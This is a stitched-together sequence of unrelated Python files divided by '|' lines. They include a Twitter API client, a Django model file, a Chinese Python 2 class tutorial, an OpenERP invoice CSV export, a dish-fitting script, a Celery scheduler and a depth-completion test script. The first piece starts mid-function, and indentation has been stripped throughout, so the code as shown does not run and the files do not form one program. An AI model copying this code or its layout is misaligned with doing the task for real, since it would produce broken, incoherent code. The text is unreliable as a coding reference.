# Get the consensus string for the best motifs collection to compute score
best_count_matrix, best_consensus = count_motifs(best_motifs, k)
# Compute scores
motifs_score = score_motifs(motifs, consensus_string, k)
bestmotifs_score = score_motifs(best_motifs, best_consensus, k)
if motifs_score < bestmotifs_score:
best_motifs = motifs
return best_motifs
def start():
k, t, dnas = read_input("dataset.txt")
result = greedy_motif_search(k, t, dnas)
for pattern in result:
print(''.join(pattern))
if __name__ == '__main__':
start()
|
#!/usr/bin/env python
# encoding: utf-8
"""
Copyright (c) 2014 tiptap. All rights reserved.
"""
import time
import traceback
import twython
import logging
log = logging.getLogger(__name__)
RATE_LIMIT_RESOURCES = ["statuses", "followers", "search", "users"]
class TwitterClient(object):
def __init__(self, appKey, accessToken, margins):
self.appKey = appKey
self.accessToken = accessToken
self.twitter = twython.Twython(
self.appKey,
access_token=self.accessToken,
client_args=dict(timeout=30)
)
self._init_rate_limits(margins)
def get_user_timeline(self, twitterId, twitterName, **kwargs):
params = {k: v for k, v in kwargs.items() if v}
params['count'] = params.get('count') or 200
params['include_rts'] = "false"
params['tweet_mode'] = "extended"
if twitterId:
params['user_id'] = twitterId
elif twitterName:
params['screen_name'] = twitterName
else:
log.info("get_user_timeline needs twitterId or twitterName")
log.info("get_user_timeline, params: %s" % params)
return self._do_twitter(
"get_user_timeline",
"statuses",
"user_timeline",
**params
)
def get_followers_ids(self, twitterName, count, **kwargs):
params = dict(
screen_name=twitterName,
count=count
)
params.update(kwargs)
log.info("get_followers_ids, params: %s" % params)
return self._do_twitter(
"get_followers_ids",
"followers",
"ids",
**params
)
def lookup_user(self, twitterIds, twitterNames):
params = {}
if twitterIds:
params['user_id'] = ",".join(twitterIds)
if twitterNames:
params['screen_name'] = ",".join(twitterNames)
if not twitterIds and not twitterNames:
log.info("lookup_user needs twitterIds or twitterNames")
log.info("lookup_users, params: %s" % params)
return self._do_twitter(
"lookup_user",
"users",
"lookup",
**params
)
def show_user(self, twitterId, twitterName):
if twitterId:
params = dict(user_id=twitterId)
elif twitterName:
params = dict(screen_name=twitterName)
else:
log.info("show_user needs twitterId or twitterName")
log.info("show_users, params: %s" % params)
return self._do_twitter(
"show_user",
"users",
"show",
**params
)
def search(self, query, **kwargs):
params = dict(q=query)
params.update(kwargs)
log.info("search, params: %s" % params)
return self._do_twitter(
"search",
"search",
"tweets",
**params
)
def _do_twitter(self, functionName, resource, method, **params):
if self.limits[resource][method]['remaining'] <= 0:
return 429, None
apiClient = twython.Twython(
app_key=self.appKey,
access_token=self.accessToken,
client_args=dict(timeout=30)
)
function = getattr(apiClient, functionName)
result = None
try:
result = function(**params)
resultCode = 200
except twython.TwythonRateLimitError as error:
self._hit_rate_limit(resource, method)
resultCode = error.error_code
except (twython.TwythonError, twython.TwythonAuthError) as error:
log.info("Twitter error: %s" % error.msg)
resultCode = error.error_code
except:
log.error(
"unexpected error accessing Twitter API, %s" %
traceback.format_exc()
)
self._update_rate_limit(apiClient, resource, method)
return resultCode, result
def get_rate_limits(self, resource, method):
limits = self.limits[resource][method]
if time.time() > limits['reset'] + self.timeMargin:
limits['remaining'] = limits['limit']
return dict(
remaining=(limits['remaining'] - self.countMargin),
reset=(limits['reset'] + self.timeMargin),
limit=limits['limit']
)
def _init_rate_limits(self, margins):
apiClient = twython.Twython(
app_key=self.appKey,
access_token=self.accessToken,
client_args=dict(timeout=30)
)
params = dict(resources=",".join(RATE_LIMIT_RESOURCES))
body = apiClient.get_application_rate_limit_status(**params)
self.limits = {}
for resource in body['resources'].keys():
self.limits[resource] = {}
for location in body['resources'][resource]:
method = location.split('/')[2]
methodLimits = body['resources'][resource][location]
self.limits[resource][method] = dict(
remaining=methodLimits['remaining'],
reset=methodLimits['reset'],
limit=methodLimits['limit']
)
self.timeMargin = margins['timeMargin']
self.countMargin = margins['countMargin']
def _update_rate_limit(self, apiClient, resource, method):
limits = self.limits[resource][method]
header = apiClient.get_lastfunction_header(
'x-rate-limit-remaining'
)
if header:
limits['remaining'] = int(header)
header = apiClient.get_lastfunction_header(
'x-rate-limit-reset'
)
if header:
limits['reset'] = int(header)
remainingTime = limits['reset'] - time.time()
log.info(
"window remaining: %s calls, %d seconds" %
(limits['remaining'], remainingTime)
)
def _hit_rate_limit(self, resource, method):
log.warning("Pissed off Twitter! Rate limit (429) response")
self.limits[resource][method]['remaining'] = 0
|
'''
Spiral copy
'''
import numpy
def spiral_copy(mat):
if len(mat) == 0:
return []
rows = len(mat)
cols = len(mat[0])
result = []
for j in range(cols):
result.append(mat[0, j])
for i in range(1, rows):
result.append(mat[i, cols - 1])
for j in range(cols - 2, -1, -1):
if rows > 1:
result.append(mat[rows - 1, j])
for i in range(rows - 2, 0, -1):
if cols > 1:
result.append(mat[i, 0])
return result + spiral_copy(mat[1:rows - 1, 1:cols - 1])
# a = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10], [11, 12, 13, 14, 15], [16, 17, 18, 19, 20]]
a = [[1]]
a = numpy.array(a)
print()
print(spiral_copy(a))
# https://javabypatel.blogspot.com/2016/11/print-matrix-in-spiral-order-recursion.html
|
#!/usr/bin/python
import sys
# Open a file to be turned into CG-only gff
fileHandle = open ( sys.argv[1] )
# Create an output file
OutFileName = sys.argv[1] + '_CG-only.gff'
OutFile = open(OutFileName, 'w')
# Give your output file headers in the first line
OutFile.write("Chr\tReads\tContext\tStart\tEnd\tMC\tStrand\tReading_frame \n")
# Read the first line of the input file and do nothing
line = fileHandle.readline()
# Read the second and subsequent lines of the input file in a while loop checking if they contain CG
# If yes, split line into its elements and prints them into the output file in a new order
# If not look at another line
line = fileHandle.readline()
if 'CG' in line:
while line:
LineElements = line.split()
OutFile.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t.\n' % (LineElements[0],LineElements[5],LineElements[3],LineElements[1],LineElements[1],LineElements[4],LineElements[2]))
line = fileHandle.readline()
else:
line = fileHandle.readline()
# Close the input file
fileHandle.close()
# Close the output file
OutFile.close()
print "CG-only gff created."
|
from django.db import models
from user.models import User
# Create your models here.
class Event(models.Model):
class Meta:
verbose_name = "事件"
verbose_name_plural = "事件"
index_together = [
['event_type', 'created_at'],
['created_at', 'vote_count']
]
title = models.CharField(max_length=32, verbose_name="标题")
content = models.TextField(default='', verbose_name="正文")
author = models.ForeignKey(User, related_name='events', on_delete=models.CASCADE, blank=None, null=True)
event_type = models.SmallIntegerField(default=0) # 0 Red 1 Black
vote_count = models.IntegerField(default=0)
is_delete = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
updated_at = models.DateTimeField(auto_now=True, db_index=True)
class Vote(models.Model):
class Meta:
verbose_name = "投票"
verbose_name_plural = "投票"
index_together = [
['event', 'vote'],
['event', 'created_at']
]
unique_together = (
('event', 'author')
)
VOTE_CHOICE = [-1, 0, 1]
event = models.ForeignKey(Event, on_delete=models.CASCADE, null=True, blank=True)
vote = models.SmallIntegerField(default=1)
author = models.ForeignKey(User, related_name='votes', on_delete=models.CASCADE, blank=None, null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return "<Vote {} on {}: {}>".format(self.author, self.event, self.vote)
|
"""
之前的程序中都是根据操作数据的函数或语句块来设计程序的。这被称为面向过程的编程。
还有一种把数据和功能结合起来,用称为对象的东西包裹起来组织程序的方法。这种方法称为面向对象的编程理念。
类和对象是面向对象编程的两个主要方面。类创建一个新类型,而对象这个类的实例。这类似于你有一个int类型的变量,这存储整数的变量是int类的实例(对象)。
对象可以使用普通的属于对象的变量存储数据。属于一个对象或类的变量被称为域。
对象也可以使用属于类的函数来具有功能。这样的函数被称为类的方法。
域和方法可以合称为类的属性。
域有两种类型--属于每个实例/类的对象或属于类本身。它们分别被称为实例变量和类变量。
类使用class关键字创建。类的域和方法被列在一个缩进块中。
self
类
对象的方法
_init_方法
类与对象的方法
继承
"""
#self
"""
类的方法与普通的函数只有一个特别的区别--它们必须有一个额外的第一个参数名称,但是
在调用这个方法的时候你不为这个参数赋值,Python会提供这个值。这个特别的变量指对象本
身,按照惯例它的名称是self。
Python如何给self赋值以及为何你不需要给它赋值?
假如你有一个类称为MyClass和这个类的一个实例MyObject。当你调用这个对象的方法MyObject.method(arg1,arg2)的时候,
这会由Python自动转为MyClass.method(MyObject,arg1,arg2)--这就是self的原理了。
"""
#类
#filename:simplestclass.py
class Person:
pass
#使用类名后跟一对圆括号来创建一个对象/实例。
p=Person()
print p
#输出<__main__.Person instance at 0x0000000002FDF3C8>:在__main__模块中有了一个Person类的实例。
#对象的方法
#filename:method.py
class Person:
#注意sayHi方法没有任何参数,但仍然在函数定义时有self。
def sayhi(self):
print r"hello,how are you!"
p=Person()
p.sayhi()
#End of method.py
#_init_方法
"""
__init__方法在类的一个对象被建立时,马上运行。(初始化)
"""
#filename:class_init.py
class Person2:
#把__init__方法定义为取一个参数name(以及普通的参数self)。在这个__init__里,只是创建一个新的域,也称为name。
#注意它们是两个不同的变量,尽管它们有相同的名字。点号使我们能够区分它们。
def __init__(self,name):
self.name=name
print r"初始化参数:",self.name
def __del__(self):
print r"初始化删除"
def sayhi(self):
print r"Hello,my name is:",self.name
# line 73, in <module> h = Person2('swaro')TypeError: this constructor takes no arguments
#h = Person2('swaroop')
#原因:在python中构造函数书写格式是__init__,而不是_init_,即在init两侧都是双下划线,不是单下划线。
h=Person2('swaroop')
h.sayhi()
#End of class_init.py
#类与对象的方法
"""
有两种类型的 域 ——类的变量和对象的变量,它们根据是类还是对象 拥有 这个变量而区分。
类的变量 由一个类的所有对象(实例)共享使用。只有一个类变量的拷贝,所以当某个对象
对类的变量做了改动的时候,这个改动会反映到所有其他的实例上。
对象的变量 由类的每个对象/实例拥有。因此每个对象有自己对这个域的一份拷贝,即它们不
是共享的,在同一个类的不同实例中,虽然对象的变量有相同的名称,但是是互不相关的。
"""
#filename:objvar.py
class Person3:
'''Represents a person.'''
population=0
#population=0
#Debugger: Debug process paused; pid=6860 [1 modules loaded]:调试过程暂停;PID = 6860 [加载了1个模块]
#population属于Person类,因此是一个类的变量。name变量属于对象(它使用self赋值)因此是对象的变量。
def __init__(self,name):
'''Initalizes the person's data '''
self.name=name
print('Inializing %s')%self.name
Person3.population+=1
#如同__init__方法一样,还有一个特殊的方法__del__,它在对象消逝的时候被调用。对象消逝即对象不再被使用,它所占用的内存将返回给系统作它用。
#在这个方法里面只是简单地把Person.population减1。
#当对象不再被使用时,__del__方法运行,但是很难保证这个方法究竟在 什么时候运行。如果想要指明它的运行,就得使用del语句
def __del__(self):
'''I am dying...'''
print '%s say goodbye!'%self
Person3.population-=1
if Person3.population == 0:
print r"I am the last one."
else:
print "There are still %d person left."%Person3.population
def sayhi(self):
'''Greeting by the person;
Really, that's all it does'''
print 'Hi,my name is %s'%self.name
def howmany(self):
'''print the current population.'''
if Person3.population == 1:
print r"I'am the only person here!"
else:
print r"We have %d person here."%Person3.population
swaroop = Person3('swaroop')
swaroop.sayhi()
swaroop.howmany()
kalam = Person3('kalam')
kalam.sayhi()
kalam.howmany()
swaroop.sayhi()
swaroop.howmany()
print r"看一下文档字符串效果:"
print Person3._doc_
print Person3.sayhi.__doc__
if __name__ == '__main__':
print 'this program is being run by itself.'
else:
print 'I am being imported from other module'
"""
Python中所有的类成员(包括数据成员)都是公共的,所有的方法都是有效的。
只有一个例外:如果你使用的数据成员名称以 双下划线前缀 比如__privatevar,Python的名称
管理体系会有效地把它作为私有变量。
"""
#End of objvar.py
#继承
"""
面向对象的编程带来的主要好处之一是代码的重用,实现这种重用的方法之一是通过继承机制。继承完全可以理解成类之间的 类型和子类型 关系。
"""
#inherit.py
class Schoolmember:
'''Represents any schoolmember!'''
def __init__(self,name,age):
self.name=name
self.age=age
print r"Initalizing school member:%s"%self.name
def tell(self):
'''Tell my details:'''
print 'Name:"%s";age:"%d"'%(self.name,self.age),
#继承:把基本类的名称作为一个元组跟在定义类时的类名称之后
class Teacher(Schoolmember):
'''Represents a teacher!'''
def __init__(self,name,age,salary):
#基本类的__init__方法专门使用self变量调用,初始化对象的基本类部分
Schoolmember.__init__(self, name, age)
self.salary=salary
print 'Initalizing Teacher:%s'%self.name
def tell(self):
Schoolmember.tell(self)
print 'Salary:"%d"'%self.salary
class Student(Schoolmember):
'''Represents a student!'''
def __init__(self, name,age,marks):
Schoolmember.__init__(self, name, age)
self.marks=marks
print 'Initalizing Student:%s'%self.name
def tell(self):
Schoolmember.tell(self)
print 'Mark:"%d"'%self.marks
t=Teacher('Mrs.shriv',40,30000)
s=Student('swaroop',22,75)
print #prints a blank line
members=[t,s]
for member in members:
member.tell()
#End of inherit.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Date ID Message
# 21-12-2011 POP-001 Change file type to cp874 (support window)
import math
from osv import fields,osv
import tools
import pooler
from tools.translate import _
from decimal import *
import decimal_precision as dp
import netsvc
import csv
import time
import codecs
from operator import itemgetter
import pymssql
class account_invoice(osv.osv):
_name = "account.invoice"
_description = "Add Dimension"
_inherit = "account.invoice"
_columns = {
'nav_exported': fields.boolean('Exported'),
}
_defaults = {
'nav_exported': False,
}
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
vals.update({'nav_exported': False})
return super(account_invoice, self).write(cr, uid, ids, vals, context=context)
def schedule_export_supplier_invoice(self, cr, uid, context=None):
purchase_export_sql = """
select id from account_invoice
where nav_exported = False and type = 'in_invoice' order by id
"""
cr.execute(purchase_export_sql)
export_ids = map(itemgetter(0), cr.fetchall())
for row in export_ids:
purchase_line_sql = """
select
account_invoice.company_id as company_id,
'Invoice' as document_type,
res_partner.nav_code_supplier as buy_from_vendor_no,
account_invoice.origin as purchase_no,
res_partner.nav_code_supplier as pay_to_vendor_no,
coalesce(res_partner_address.name,'') as pay_to_contact,
to_char(CURRENT_DATE,'DD/MM/yyyy') as order_date,
to_char(CURRENT_DATE,'DD/MM/yyyy') as posting_date,
account_payment_term.code_nav as payment_term_code, --payment_term (int)
'' as currency_code, --currency_id (int)
'Yes' as price_include_vat, --account_invoice.amount_total as
'' as vendor_invoice_no,
coalesce(address2.name,'') as buy_from_contact,
to_char(now(), 'DD/MM/yyyy HH:mm:ss') as last_interfaced,
'G/L Account' as nav_type,
account_account.code as account_no,
replace(account_invoice_line.name,'"','') as description,
replace(account_invoice_line.name,'"','') as description2,
account_invoice_line.quantity as quantity,
account_invoice_line.price_unit as direct_unit_cost,
account_invoice_line.discount as line_discount,
post1.code_nav as gen_posting_group,
post2.code_nav as vat_posting_group,
'' as uom,
post3.code_nav as wht_posting_group,
d1.code as dimension_1,
d2.code as dimension_2,
d3.code as dimension_3,
d4.code as dimension_4,
d5.code as dimension_5,
d6.code as dimension_6,
account_invoice.id as invoice_id
from account_invoice_line
join account_invoice on account_invoice_line.invoice_id = account_invoice.id
left join res_partner_address on account_invoice.address_invoice_id = res_partner_address.id
left join res_partner_address address2 on account_invoice.address_contact_id = address2.id
left join account_account on account_invoice_line.account_id = account_account.id
left join purchase_order on purchase_order.name = account_invoice.origin
left join res_partner on account_invoice.partner_id = res_partner.id
left join account_payment_term on account_invoice.payment_term = account_payment_term.id
left join ineco_nav_postmaster post1 on res_partner.gen_bus_posting_group_id = post1.id
left join ineco_nav_postmaster post2 on res_partner.vat_bus_posting_group_id = post2.id
left join ineco_nav_postmaster post3 on res_partner.wht_bus_posting_group_id = post3.id
left join ineco_nav_dimension d1 on purchase_order.dimension_company = d1.id
left join ineco_nav_dimension d2 on purchase_order.dimension_department = d2.id
left join ineco_nav_dimension d3 on purchase_order.dimension_project = d3.id
left join ineco_nav_dimension d4 on purchase_order.dimension_product = d4.id
left join ineco_nav_dimension d5 on purchase_order.dimension_retailer = d5.id
left join ineco_nav_dimension d6 on purchase_order.dimension_customer = d6.id
where
account_invoice.type = 'in_invoice' --supplier invoice
and account_invoice.nav_exported = False
and account_invoice.id = %s
"""
cr.execute(purchase_line_sql % row)
line_data = cr.dictfetchall()
if len(line_data):
line_no = 1
config_ids = self.pool.get('ineco.export.config').search(cr, uid, [('type','=','purchase'),('company_id','=',line_data[0]['company_id'])])
config_obj = self.pool.get('ineco.export.config').browse(cr, uid, config_ids)
if config_obj:
config = config_obj[0]
path = config.path+"PI-"+str(line_data[0]['company_id']) +"-"+str(row)+".csv"
#POP-001
f = open(path, 'wt')
#f = codecs.open(path, encoding='cp874', mode='w+')
writer = csv.writer(f)
for line in line_data:
if config_obj:
writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
try:
writer.writerow([
line['document_type'],
line['buy_from_vendor_no'].encode('cp874'), #NAV
line['purchase_no'],
line['pay_to_vendor_no'].encode('cp874'), #NAV
line['pay_to_contact'].encode('cp874'), #Address ERP
line['order_date'], #required gen date of erp
line['posting_date'],
line['payment_term_code'],
line['currency_code'], #NAV
line['price_include_vat'] or 'Yes', #NAV Vat Type (include,exclude) (Yes,No)
line['vendor_invoice_no'],
line['buy_from_contact'].encode('cp874'), #NAV
line['last_interfaced'], #Address ERP
line_no,
line['nav_type'],
line['account_no'], #Account No ERP
line['description'][0:50].encode('cp874'),
line['description2'][50:0].encode('cp874'),
line['quantity'],
line['direct_unit_cost'],
line['line_discount'],
line['gen_posting_group'] , #NAV Generate from Gen. Product Posting Group
line['vat_posting_group'] , #NAV
line['uom'],
line['wht_posting_group'] , #NAV
line['dimension_1'],
line['dimension_2'],
line['dimension_3'],
line['dimension_4'],
line['dimension_5'],
#line['dimension_6'],
])
except Exception, err:
self.log(cr, uid, line['invoice_id'], 'Export Error -> '+line['purchase_no']+":"+str(err))
pass
line_no += 1
if config_obj:
cr.execute("update account_invoice set nav_exported = True where id = %s " % row)
#self.pool.get('purchase.order').write(cr, uid, [row], {'nav_exported': True})
return True
def schedule_export_customer_invoice(self, cr, uid, context=None):
purchase_export_sql = """
select id from account_invoice
where nav_exported = False and type = 'out_invoice' order by id
"""
cr.execute(purchase_export_sql)
export_ids = map(itemgetter(0), cr.fetchall())
for row in export_ids:
purchase_line_sql = """
select
account_invoice.company_id as company_id,
'Invoice' as document_type,
res_partner.nav_code_customer as buy_from_vendor_no,
account_invoice.origin as purchase_no,
res_partner.nav_code_customer as pay_to_vendor_no,
coalesce(res_partner_address.name,'') as pay_to_contact,
to_char(account_invoice.date_invoice, 'DD/MM/yyyy') as order_date,
to_char(account_invoice.date_invoice,'DD/MM/yyyy') as posting_date ,
account_payment_term.code_nav as payment_term_code, --payment_term (int)
'' as currency_code, --currency_id (int)
account_invoice.amount_total as price_include_vat,
'' as vendor_invoice_no,
coalesce(address2.name,'') as buy_from_contact,
to_char(now(), 'DD/MM/yyyy HH:mm') as last_interfaced,
'G/L Account' as nav_type,
account_account.code as account_no,
account_invoice_line.name as description,
'' as description2,
account_invoice_line.quantity as quantity,
account_invoice_line.price_unit as direct_unit_cost,
account_invoice_line.discount as line_discount,
post1.code_nav as gen_posting_group,
post2.code_nav as vat_posting_group,
'' as uom,
post3.code_nav as wht_posting_group,
d1.code as dimension_1,
d2.code as dimension_2,
d3.code as dimension_3,
d4.code as dimension_4,
d5.code as dimension_5,
d6.code as dimension_6,
account_invoice.name as contact_no,
account_invoice.id as invoice_id,
res_partner.taxcoding as taxcoding,
to_char(sale_order.date_period_start,'dd/mm/yyyy') || ' - ' || to_char(sale_order.date_period_finish,'dd/mm/yyyy') as cycle_name,
sale_order.date_period_finish - sale_order.date_period_start + 1 as cycle_day,
pcserv.name as service_category_name,
pcustomer.name as customer_product_name,
'' as customer_po
from account_invoice_line
join account_invoice on account_invoice_line.invoice_id = account_invoice.id
left join res_partner_address on account_invoice.address_invoice_id = res_partner_address.id
left join res_partner_address address2 on account_invoice.address_contact_id = address2.id
left join account_account on account_invoice_line.account_id = account_account.id
left join sale_order on sale_order.name = account_invoice.origin
left join res_partner on account_invoice.partner_id = res_partner.id
left join account_payment_term on account_invoice.payment_term = account_payment_term.id
left join ineco_nav_postmaster post1 on res_partner.gen_bus_posting_group_id = post1.id
left join ineco_nav_postmaster post2 on res_partner.vat_bus_posting_group_id = post2.id
left join ineco_nav_postmaster post3 on res_partner.wht_bus_posting_group_id = post3.id
left join ineco_nav_dimension d1 on sale_order.dimension_company = d1.id
left join ineco_nav_dimension d2 on sale_order.dimension_department = d2.id
left join ineco_nav_dimension d3 on sale_order.dimension_project = d3.id
left join ineco_nav_dimension d4 on sale_order.dimension_product = d4.id
left join ineco_nav_dimension d5 on sale_order.dimension_retailer = d5.id
left join ineco_nav_dimension d6 on sale_order.dimension_customer = d6.id
left join product_template pserv on sale_order.customer_product_id = pserv.id
left join product_category pcserv on pserv.categ_id = pcserv.id
left join product_template pcustomer on sale_order.customer_product_id = pcustomer.id
where
account_invoice.type = 'out_invoice' --supplier invoice
and account_invoice.nav_exported = False
and account_invoice.id = %s
"""
cr.execute(purchase_line_sql % row)
line_data = cr.dictfetchall()
if len(line_data):
line_no = 1
config_ids = self.pool.get('ineco.export.config').search(cr, uid, [('type','=','sale'),('company_id','=',line_data[0]['company_id'])])
config_obj = self.pool.get('ineco.export.config').browse(cr, uid, config_ids)
if config_obj:
config = config_obj[0]
path = config.path+"SALESINV-"+str(line_data[0]['company_id']) +"-"+str(row)+".csv"
#POP-001
f = open(path, 'wt')
#f = codecs.open(path, encoding='cp874', mode='w+')
writer = csv.writer(f)
for line in line_data:
if config_obj:
writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
try:
writer.writerow([
line['document_type'],
line['buy_from_vendor_no'].encode('cp874'), #NAV
line['purchase_no'],
line['pay_to_vendor_no'].encode('cp874'), #NAV
line['pay_to_contact'].encode('cp874') or '', #Address ERP
line['posting_date'], #ERP Generate Curredimension_6nt Date Post
line['payment_term_code'], #NAV
line['currency_code'], #NAV
'No' , #line['price_include_vat'], #Boolean Yes/No
'S001' , #Add Nav Sale ID
line['buy_from_contact'].encode('cp874'), #NAV
line['last_interfaced'], #Address ERP
line_no,
line['nav_type'],
line['account_no'], #Account No ERP
line['description'][0:50].encode('cp874'),
line['description2'][50:0].encode('cp874'),
line['quantity'],
line['uom'],
line['direct_unit_cost'],
line['line_discount'],
line['gen_posting_group'] or '', #NAV
line['vat_posting_group'] or '', #NAV REQUERY from master product
line['wht_posting_group'] or '', #NAV or '' ว่าง
line['contact_no'] or '',
line['dimension_1'],
line['dimension_2'],
line['dimension_3'],
line['dimension_4'],
line['dimension_5'],
line['dimension_6'],
line['taxcoding'] or '',
line['service_category_name'][0:30].encode('cp874') or '',
line['cycle_name'] or '',
line['customer_product_name'][0:30].encode('cp874') or '',
line['cycle_day'],
line['customer_po'] or '',
])
except Exception, err:
self.log(cr, uid, line['invoice_id'], 'Export Error -> '+line['purchase_no']+":"+str(err))
pass
line_no += 1
if config_obj:
cr.execute("update account_invoice set nav_exported = True where id = %s " % row)
#self.pool.get('purchase.order').write(cr, uid, [row], {'nav_exported': True})
return True
account_invoice() |
import numpy as np
from matplotlib import pyplot as plt
#x0=-1.3604886221977293
#y0=58.22147608157934
#z0=-1512.8772100367873
#a=0.00016670445477401342
data=np.loadtxt('dish_zenith.txt')
x_data=data[:,0]
y_data=data[:,1]
z_data=data[:,2]
# A: c1+c2*x+c3*x*x+c4*y+c5*y*y
A=np.zeros([len(x_data),4])
A[:,0]=1
A[:,1]=x_data
A[:,2]=y_data
A[:,3]=x_data*x_data+y_data*y_data
coeff=np.linalg.inv(A.T@A)@(A.T@z_data)
a=coeff[3]
x0=-coeff[1]/(2*a)
y0=-coeff[2]/(2*a)
z0=coeff[0]-a*x0*x0-a*y0*y0
r1=z_data-z0-a*((x_data-x0)**2+(y_data-y0)**2)
r=z_data-A@coeff
rms=np.std(r)
print('The rms error is ',rms)
N=np.outer(r,r)
error=np.linalg.inv(A.T@(np.linalg.inv(N)@A))
err,v=np.linalg.eig(error)
print('coeff is ',coeff)
print('error is ',err)
print('error of a is ',err[3])
plt.ion()
plt.plot(a*((x_data-x0)**2+(y_data-y0)**2),r,'.')
plt.show()
|
import time
import shelve
import atexit
import threading
from UserDict import UserDict
from datetime import datetime
from celery import conf
from celery import registry
from celery.log import setup_logger
from celery.exceptions import NotRegistered
class SchedulingError(Exception):
"""An error occured while scheduling task."""
class ScheduleEntry(object):
"""An entry in the scheduler.
:param task: The task class.
:keyword last_run_at: The time and date when this task was last run.
:keyword total_run_count: Total number of times this periodic task has
been executed.
"""
def __init__(self, name, last_run_at=None,
total_run_count=None):
self.name = name
self.last_run_at = last_run_at or datetime.now()
self.total_run_count = total_run_count or 0
def next(self):
return self.__class__(self.name, datetime.now(),
self.total_run_count + 1)
def is_due(self, task):
return task.is_due(self.last_run_at)
class Scheduler(UserDict):
"""Scheduler for periodic tasks.
:keyword registry: The task registry to use.
:keyword schedule: The schedule dictionary. Default is the global
persistent schedule ``celery.beat.schedule``.
"""
interval = 1
def __init__(self, **kwargs):
def _get_default_logger():
import multiprocessing
return multiprocessing.get_logger()
attr_defaults = {"registry": lambda: {},
"schedule": lambda: {},
"interval": lambda: self.interval,
"logger": _get_default_logger}
for attr_name, attr_default_gen in attr_defaults.items():
if attr_name in kwargs:
attr_value = kwargs[attr_name]
else:
attr_value = attr_default_gen()
setattr(self, attr_name, attr_value)
self.cleanup()
self.schedule_registry()
def tick(self):
"""Run a tick, that is one iteration of the scheduler.
Executes all due tasks."""
for entry in self.get_due_tasks():
self.logger.debug("Scheduler: Sending due task %s" % (
entry.name))
result = self.apply_async(entry)
self.logger.debug("Scheduler: %s sent. id->%s" % (
entry.name, result.task_id))
def get_due_tasks(self):
"""Get all the schedule entries that are due to execution."""
return filter(self.is_due, self.schedule.values())
def get_task(self, name):
try:
return self.registry[name]
except KeyError:
raise NotRegistered(name)
def is_due(self, entry):
return entry.is_due(self.get_task(entry.name))
def apply_async(self, entry):
# Update timestamps and run counts before we actually execute,
# so we have that done if an exception is raised (doesn't schedule
# forever.)
entry = self.schedule[entry.name] = entry.next()
task = self.get_task(entry.name)
try:
result = task.apply_async()
except Exception, exc:
raise SchedulingError(
"Couldn't apply scheduled task %s: %s" % (
task.name, exc))
return result
def schedule_registry(self):
"""Add the current contents of the registry to the schedule."""
periodic_tasks = self.registry.get_all_periodic()
for name, task in self.registry.get_all_periodic().items():
if name not in self.schedule:
self.logger.debug(
"Scheduler: Adding periodic task %s to schedule" % (
task.name))
self.schedule.setdefault(name, ScheduleEntry(task.name))
def cleanup(self):
for task_name, entry in self.schedule.items():
if task_name not in self.registry:
self.schedule.pop(task_name, None)
@property
def schedule(self):
return self.data
class ClockService(object):
scheduler_cls = Scheduler
schedule_filename = conf.CELERYBEAT_SCHEDULE_FILENAME
registry = registry.tasks
def __init__(self, logger=None, is_detached=False):
self.logger = logger
self._shutdown = threading.Event()
self._stopped = threading.Event()
def start(self):
self.logger.info("ClockService: Starting...")
schedule = shelve.open(filename=self.schedule_filename)
#atexit.register(schedule.close)
scheduler = self.scheduler_cls(schedule=schedule,
registry=self.registry,
logger=self.logger)
self.logger.debug(
"ClockService: Ticking with interval->%d, schedule->%s" % (
scheduler.interval, self.schedule_filename))
synced = [False]
def _stop():
if not synced[0]:
self.logger.debug("ClockService: Syncing schedule to disk...")
schedule.sync()
schedule.close()
synced[0] = True
self._stopped.set()
try:
while True:
if self._shutdown.isSet():
break
scheduler.tick()
time.sleep(scheduler.interval)
except (KeyboardInterrupt, SystemExit):
_stop()
finally:
_stop()
def stop(self, wait=False):
self._shutdown.set()
wait and self._stopped.wait() # block until shutdown done.
class ClockServiceThread(threading.Thread):
def __init__(self, *args, **kwargs):
self.clockservice = ClockService(*args, **kwargs)
threading.Thread.__init__(self)
self.setDaemon(True)
def run(self):
self.clockservice.start()
def stop(self):
self.clockservice.stop(wait=True)
|
from .code_climate_formatter import CodeClimateFormatter
from .html_report_formatter import HTMLReportFormatter
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Filename: test.py
# @Project: GuideNet
# @Author: jie
# @Time: 2021/3/16 4:47 PM
import os
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
import torch
import yaml
from easydict import EasyDict as edict
import datasets
import encoding
def test():
net.eval()
for batch_idx, (rgb, lidar, _, idx, ori_size) in enumerate(testloader):
with torch.no_grad():
if config.tta:
rgbf = torch.flip(rgb, [-1])
lidarf = torch.flip(lidar, [-1])
rgbs = torch.cat([rgb, rgbf], 0)
lidars = torch.cat([lidar, lidarf], 0)
rgbs, lidars = rgbs.cuda(), lidars.cuda()
depth_preds, = net(rgbs, lidars)
depth_pred, depth_predf = depth_preds.split(depth_preds.shape[0] // 2)
depth_predf = torch.flip(depth_predf, [-1])
depth_pred = (depth_pred + depth_predf) / 2.
else:
rgb, lidar = rgb.cuda(), lidar.cuda()
depth_pred, = net(rgb, lidar)
depth_pred[depth_pred < 0] = 0
depth_pred = depth_pred.cpu().squeeze(1).numpy()
idx = idx.cpu().squeeze(1).numpy()
ori_size = ori_size.cpu().numpy()
name = [testset.names[i] for i in idx]
save_result(config, depth_pred, name, ori_size)
if __name__ == '__main__':
# config_name = 'GN.yaml'
config_name = 'GNS.yaml'
with open(os.path.join('configs', config_name), 'r') as file:
config_data = yaml.load(file, Loader=yaml.FullLoader)
config = edict(config_data)
from utils import *
